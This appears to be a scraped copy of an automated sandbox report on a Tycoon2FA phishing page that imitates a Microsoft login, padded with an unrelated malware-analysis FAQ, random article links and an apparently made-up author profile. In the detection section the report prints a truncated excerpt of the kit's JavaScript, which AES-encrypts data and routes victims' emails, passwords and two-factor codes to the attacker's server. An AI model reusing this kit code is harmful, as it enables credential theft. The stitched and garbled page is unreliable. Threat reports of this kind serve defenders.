Automated Malware Analysis Management Report for https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/ (2024)

Table of Contents
Overview General Information Detection Signatures Classification AV Detection Phishing FAQs

Loading... Additional Content is being loaded

Overview

General Information

Sample URL: https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/
Analysis ID: 1470243
Infos:

Detection

HTMLPhisher, Tycoon2FA

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Yara detected HtmlPhish10

Yara detected Tycoon 2FA PaaS

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Phishing site detected (based on shot match)

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

HTTP GET or POST without a user agent

Invalid T&C link found

Stores files to the Windows start menu directory

See Also
"We have original results," PDP rejects INEC's presidential election resultTerros Health hiring Health Center Director- Integrated Care/ Behavioral Health - Phoenix, AZ - LCSW, LPC, LISAC, LMSW, LAC, LASAC - Signing Bonus: $3K-$5K -Terros Health - 23rd Avenue - SMI in Phoenix, Arizona, United States | LinkedInHow do you treat someone who doesn’t accept they’re ill?Stephan Nguyen on LinkedIn: #cassiaorganic #cinnamon #cinnamonorganic #cassia #organicspices…

Classification

Automated Malware Analysis Management Report for https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/ (2)

Signatures

AV Detection

Automated Malware Analysis Management Report for https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/ (3)Automated Malware Analysis Management Report for https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/ (4)
Source: https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/ SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
Source: https://pes.logentr.com/mnurqprhukiuaxcargTELAUYNYDORTTUFCTRQZWSMFJJRXESDQSSJIVQIVWL12CLwAxoAMvR785pBvWqr50 Avira URL Cloud: Label: malware
Source: https://pes.logentr.com/mnurqprhukiuaxcargTELAUYNYDORTTUFCTRQZWSMFJJRXESDQSSJIVQIVWLpqfH0qhQAPX0L3PTK12e5i6wx33 Avira URL Cloud: Label: malware
Source: https://i8g.25bvnw8.ru/OGRErAiYFRWPrIyzEhjMLxybbUEjmxqvscHFPEBEMHWJZGUDULHSNAXLHFXXWLFM Avira URL Cloud: Label: phishing

Phishing

Automated Malware Analysis Management Report for https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/ (5)Automated Malware Analysis Management Report for https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/ (6)
Source: https://8ex.unceridefu.com LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://8ex.unceridefu.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The domain name is suspicious and does not appear to be related to Microsoft. The page prominently displays a login form asking for a password, which is a common tactic used in phishing attacks. The email address shown (admin@microsoft.com) is used to mislead users into thinking the site is legitimate. There is no CAPTCHA present, which is often used on legitimate login pages to prevent automated attacks. The combination of these factors strongly suggests that this is a phishing site. DOM: 3.8.pages.csv
Source: https://8ex.unceridefu.com LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://8ex.unceridefu.com' is highly suspicious and does not match the legitimate domain 'microsoft.com'. The webpage resembles a Microsoft login page, which is a common target for phishing attacks. The presence of a prominent login form asking for a password is a red flag. The domain name 'unceridefu.com' is not associated with Microsoft and appears to be randomly generated, which is a common tactic used in phishing attacks to mislead users. Additionally, the email address 'admin@microsoft.com' is used to create a sense of legitimacy, which is a social engineering technique. There is no CAPTCHA present, which is often used on legitimate sites to prevent automated attacks. Based on these factors, it is highly likely that this is a phishing site. DOM: 3.9.pages.csv
Source: Yara match File source: 3.8.pages.csv, type: HTML
Source: Yara match File source: 3.7.pages.csv, type: HTML
Source: Yara match File source: 3.9.pages.csv, type: HTML
Source: Yara match File source: 1.4.pages.csv, type: HTML
Source: https://8ex.unceridefu.com/YGXCBGSOMDADAAJUMLTW79582967569965683538ellvnhkbeynhobodmuiudlva?cyqpokupoqvuxlkqkaaQKBXMCCCYPQHKQMTIA Matcher: Found strong image similarity, brand: MICROSOFT
Source: https://8ex.unceridefu.com/YGXCBGSOMDADAAJUMLTW79582967569965683538ellvnhkbeynhobodmuiudlva?cyqpokupoqvuxlkqkaaQKBXMCCCYPQHKQMTIA Matcher: Template: microsoft matched
Source: https://8ex.unceridefu.com/YGXCBGSOMDADAAJUMLTW79582967569965683538ellvnhkbeynhobodmuiudlva?cyqpokupoqvuxlkqkaaQKBXMCCCYPQHKQMTIA Matcher: Template: microsoft matched
Source: https://8ex.unceridefu.com/cY2tCmX2/ Matcher: Template: captcha matched
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/64r5w/0x4AAAAAAAedK2YDU21MRige/auto/normal/auto/ Matcher: Template: captcha matched
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/64r5w/0x4AAAAAAAedK2YDU21MRige/auto/normal/auto/ Matcher: Template: captcha matched
Source: https://8ex.unceridefu.com/YGXCBGSOMDADAAJUMLTW79582967569965683538ellvnhkbeynhobodmuiudlva?cyqpokupoqvuxlkqkaaQKBXMCCCYPQHKQMTIA HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "wJIy";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "werie6jZkbSUVFErOYvIPRRTYlJ8py2bNxmlwv8AqvJBA6i";var gdf = "ijCrZyKtzZYZV4lkDyzvdslXsglHEIWVmyy0zcd120";var odf = "ijCIhNRzgMfT9tdqyzIVc7eEM9Lfzz5UFtTab648";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome|chromium|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false || route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq|rs)[A-Za-z0-9]{6,18}(yz|12|34)[A-Za-z0-9]{2,7}(uv|wx)(3[1-9]|40)/gm;}if(route == "checkpass"){randpattern = /(yz|12)[A-Za-z0-9]{7,14}(56|78)[A-Za-z0-9]{3,8}(op|qr)(4[1-9]|50)/gm;}if(route == "twofaselect"){randpattern = /(56|78|90)[A-Za-z0-9]{8,16}(23|45|67)[A-Za-z0-9]{4,9}(st|uv)(5[1-9]|60)/gm;}if(route == "twofaselected"){randpattern = /(23|45)[A-Za-z0-9]{9,20}(89|90|ab)[A-Za-z0-9]{5,10}(vw|xy)(6[1-9]|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formatted
Automated Malware Analysis Management Report for https://live.dot.vu/p/mccpppo/flipbook-start-with-pdf/ (2024)

FAQs

What is automated malware analysis? ›

Fully automated analysis scans suspected malware files using automated tools, focusing on what the malware can do once inside your system. After the analysis, you get a report outlining the potential damage to assets connected to your network.

Show Me More
How do I set up a malware analysis VM? ›

1. Prepping your VM for Malware Analysis
  1. Create a virtual machine.
  2. Choose an OS type.
  3. Allocate RAM. Most virtual machine configurations recommend a minimum of 1024 MB.
  4. Create a virtual hard disk. ...
  5. Allocate storage. ...
  6. Install guest OS. ...
  7. Snapshot your VM.
May 1, 2023

Learn More Now
How do I create a malware analysis lab? ›

Steps for Building Malware Analysis Labs
  1. Install VMware OR Virtual Box on your Environment.
  2. Create a Window10 Lab with the help of win10 iso file.
  3. Important Steps : After installing Windows Take a Snapshot save it as “BASE LAB”.
Jan 14, 2024

View More
How to detect malware using AI? ›

We require comprehensive analysis of files, images, and other downloadable data to check for the presence of a malware. Our AI system monitors every attachment that enters our server. Further, it traces every single code in the incoming files in search of peculiar scripts.

Read On
What is the difference between a virus and a malware scanner? ›

Antivirus software is designed primarily to prevent infection, but also includes the ability to remove malware from an infected computer. Stand-alone malware remover provides a convenient way of finding and removing malware from a computer or device in case the product already installed is unable to do so.

Discover More Details
How do I run a malware virus scan? ›

Run a malware scan manually
  1. Select Start > Settings > Update & Security > Windows Security and then Virus & threat protection. Open Windows Security settings.
  2. Under Current threats, select Quick scan (or in early versions of Windows 10, under Threat history, select Scan now).

Discover More
Is it safe to open malware on a VM? ›

Virtualization is not a perfect solution for testing malware, and it also poses some challenges and limitations. Malware can detect if they are running on a VM, and change their behavior or stop working, to evade analysis or avoid triggering alarms.

Show Me More
How does a VM get corrupted? ›

Hardware Failures: Physical issues with the underlying hardware, such as hard disk failures or memory issues, can lead to data corruption within the virtual machine. Malware and virus attacks: Malware and security threats, including viruses and ransomware, compromise data integrity on our virtual machines.

View Details
How do you trace malware? ›

10 Malware Detection Techniques
  1. Signature-based detection. ...
  2. Static file analysis. ...
  3. Dynamic malware analysis. ...
  4. Dynamic monitoring of mass file operations. ...
  5. File extensions blocklist/blocklisting. ...
  6. Application allowlist/allowlisting. ...
  7. Malware honeypot/honeypot files. ...
  8. Checksumming/cyclic redundancy check (CRC)
Jan 3, 2023

Discover More Details
What software is used to scan for malware? ›

Does Malwarebytes remove all malware? Yes, the best virus scanner will be both a virus removal tool and an anti-malware program such as Malwarebytes for Windows, Malwarebytes for Mac, Malwarebytes for Android, or Malwarebytes for Chromebook.

Explore More

What is Android malware analysis? ›

Android malware analysis is a critical aspect of cybersecurity focused on understanding, identifying, and mitigating malicious software specifically designed for Android operating systems. As the popularity of Android devices continues to grow, so does the threat landscape of malware targeting these platforms.

See More
What is meant by malware analysis? ›

Malware Analysis is the practice of determining and analyzing suspicious files on endpoints and within networks using dynamic analysis, static analysis, or full reverse engineering.

Discover More Details
What is automated behavioral analysis of malware? ›

Cuckoo Sandbox is an open-source, automated malware analysis system compatible with Windows, macOS, Linux, and Android platforms. It efficiently examines suspicious files within minutes, providing a detailed report on the discovered behavior in a realistic, isolated environment.

Find Out More
What is an automated malware analysis tool in which a malware can be dynamical analyzed called? ›

Malware Sandbox is a dynamic malware analysis technology that analyzes files and URLs in a secure virtual environment. Dynamic malware analysis is particularly helpful for discovering sophisticated attacks, so many organizations are switching to dynamic and hybrid malware analysis tools.

Discover More Details
What are the two common technique for malware analysis? ›

Two forms of malware analysis exist for malicious executables: static and dynamic. As its name implies, static analysis (also known as static binary analysis or source code analysis) examines computer code without executing a program. Alternatively, dynamic analysis examines the behavior of a program at runtime.

Explore More
Top Articles
Easy and Quick Ampalaya with Egg recipe
Baked Beet Chips Recipe - A Spicy Perspective
Video | Highlights, Videos, Exclusive Content
Store Inventory Manager - Albany, NZ
Замена машины Burrito (burrito.dff, burrito.dff) в GTA San Andreas (222 файла) / Страница 15
Complete guide to Statue of Liberty National Monument in NYC
Days Till Dec 6
Workday HCM vs Workhuman | TrustRadius
Best Luxury Suv Lease Deals
Unleash Your Inner Comedian with Pixlr's Meme Maker
[PDF] Cytohesin-1/2 MA1-062 Affinity Bioreagents Inc 100 µg STK Laminin MA Affinity Bioreagents Inc 100 µg STK 4460 - Free Download PDF
How To You Answer A History 8 Mark Question (gcse)
Latest Posts
25 Super Easy Keto Freezer Meal Recipes
Keto Naan Bread - Don't Have Curry Without This Delicious Recipe
Article information

Author: Delena Feil

Last Updated:

Views: 6275

Rating: 4.4 / 5 (65 voted)

Reviews: 88% of readers found this page helpful

Author information

Name: Delena Feil

Birthday: 1998-08-29

Address: 747 Lubowitz Run, Sidmouth, HI 90646-5543

Phone: +99513241752844

Job: Design Supervisor

Hobby: Digital arts, Lacemaking, Air sports, Running, Scouting, Shooting, Puzzles

Introduction: My name is Delena Feil, I am a clean, splendid, calm, fancy, jolly, bright, faithful person who loves writing and wants to share my knowledge and understanding with you.